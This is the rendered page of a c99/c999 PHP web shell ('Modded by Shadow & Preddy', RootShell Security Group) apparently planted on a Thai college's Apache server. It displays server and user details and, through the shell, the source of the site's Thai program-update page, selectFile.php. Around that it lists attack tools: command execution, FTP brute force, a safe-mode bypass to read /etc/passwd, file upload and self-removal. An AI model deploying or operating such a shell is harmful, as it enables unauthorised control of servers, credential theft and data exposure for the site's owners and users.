!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/ums/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     selectFile.php (5.9 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include_once("pagebody.php");
pageHeader();
?>
<?php
include_once("clsumfileupdate.php");
include_once(
"clsumfileupdatetemp.php");
include_once(
"lib/nusoap/nusoap.php");
include_once(
"lib/nusoap/globalversion.php");
include_once(
"lib/nusoap/funct.php");

confirmSubmit();        
openWindow();
autotab();

$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
$oFd = new umfileupdate($oC);
$oFdt=new umfileupdatetemp($oC);


 
?>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<br><br>
<table width="740" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
        <td>
<form name="ff" METHOD="POST" action="showUpdate2.php">
<table width="100%" border="1" cellspacing="0" cellpadding="0" bordercolor="#CCCCCC">
            <tr>
            <td colspan="6" align="center"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>"> <b>
            ไฟล์ทั้งหมดได้ถูกจัดเก็บที่วิทยาลัยแล้ว <br>กรุณากดปุ่มอัพเดทโปรแกรมเพื่อยืนยันการใช้งาน<br><br>
            </font></td>
            <tr bgcolor="<?php echo $GLOBALS["bg3"];?>"> 
              <td colspan="7" align="center"><font size="3" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>การอัพเดทโปรแกรม</strong></font></td>
            </tr>
            <tr bgcolor="<?php echo $GLOBALS["bg2"];?>"> 
              
    <td width="5%"  height="17" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>ลำดับที่</strong></font></td>            
    <td width="45%"   align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>ชื่อไฟล์ 
      (เวอร์ชั่น)</strong></font></td>      
    <td width="5%"   align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>&nbsp;</strong>
      </font></td>      
          <td width="18%"   align="center" ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>Path</strong> 
      </font></td>       
      <td width="12%"   align="center" ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>วัน เวลา<br>ที่อัพเดท</strong> 
      </font></td>          
    <td width="15%"  align="center" ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><strong>รายละเอียด<br>การเปลี่ยนแปลง</strong> 
      </font></td>
            </tr>
            <?    $i=0;
        
$oFd->SearchByflagupdateD2();
        while(
$oFd->GetRecord()){
            if((
$i%2) == 0)
                                          echo 
"<tr>";
                                    else
                                          echo 
"<tr bgcolor=\"".$GLOBALS["bg1"]."\">";
?>
              <td height="22" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><? echo ($i+1); ?></font></td>
              
            <td align="left"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"> 
              <? if($oFd->filename2==""){ echo $oFd->filename1; }else{ echo $oFd->filename2; }?>
              </font></td>
              <td align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"> 
                <? if($oFd->flagfile=="1"){ echo "C"; }else if($oFd->flagfile=="2"){ echo "E"; }else{  echo "D";  }  ?>
                </font></td>
              <td align="left" ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"><? echo $oFd->path;  ?> 
                </font></td>
                <td align="center" ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"> 
                <? echo abbreDate2($oFd->updateDate)."<br>".$oFd->updatetime ?> </font>
               </td>
              <td align="left" ><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>"> 
                <? if($oFd->detail==""){  echo "-&nbsp;(ลบไฟล์)"; }else{  echo $oFd->detail;  } ?> </font>
               </td>
            </tr>
            <?  $i++;  } 
        
                if(
$i == 0){
?>
            <tr> 
              <td colspan="7" height="22" align="center"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">** 
                ไม่ปรากฏรายการในฐานข้อมูล **</font></td>
            </tr>
            <?php
                        
}else{  ?>

            
          </table>
          
  <table    width="100%" align="center" border="0" cellspacing="0" cellpadding="1" >
    <!--DWLayoutTable-->
    <tr bgcolor="silver"> 
            <td width="731"><!--DWLayoutEmptyCell-->&nbsp; </td>
      <td width="218" align="right"><font size="2">รวม <?php echo $i?> รายการ</font></td>
    </tr>
    <tr> 
      <td height="22">&nbsp;</td>
      <td>&nbsp;</td>
    </tr>
    <tr> 
      <td height="27" colspan="2" align="center" valign="top"> 
      <input type="hidden" name="countfile" value="<?php echo $i;?>"> 
        <input type="hidden" name="method" value="select_file">
        <input type="hidden" name="fileerror" value="<?php echo $fileerror;?>">
        <input type="submit" name="select_file" value="อัพเดทโปรแกรม" onClick='return file_upload();'>
     </td>
    </tr>
  </table></form>
  <table width="740" border="0" align="center" cellpadding="0" cellspacing="0"><tr><td>
<font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>"> <b>หมายเหตุ 
      : </b>&nbsp;<br>
      ประเภทของไฟล์ :: C หมายถึงไฟล์ที่สร้างใหม่<br>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      E หมายถึงไฟล์ที่แก้ไข<br>
      &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
      D หมายถึงไฟล์ที่ถูกลบ<br> 
</font></td></tr></table>
  </td></tr></table>
  <? }?>
<!--------------------------------------------------------------------->
<?php pageFooter(); ?><script>
function file_upload(){
        var agree=confirm("คุณต้องการอัพเดทโปรแกรมแน่นอนใช่หรือไม่ ?");
        if (agree){
            document.ff.submit();
            return true ;
        }else{
            return false ;
        }    
}
function file_upload2(){
        var agree=confirm("คุณต้องการออกจากเมนูอัพเดทโปรแกรมแน่นอนใช่หรือไม่ ?");
        if (agree){
            document.ff.action="adminIndex.php?mm=1";
            return true ;
        }else{
            return false ;
        }    
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0155 ]--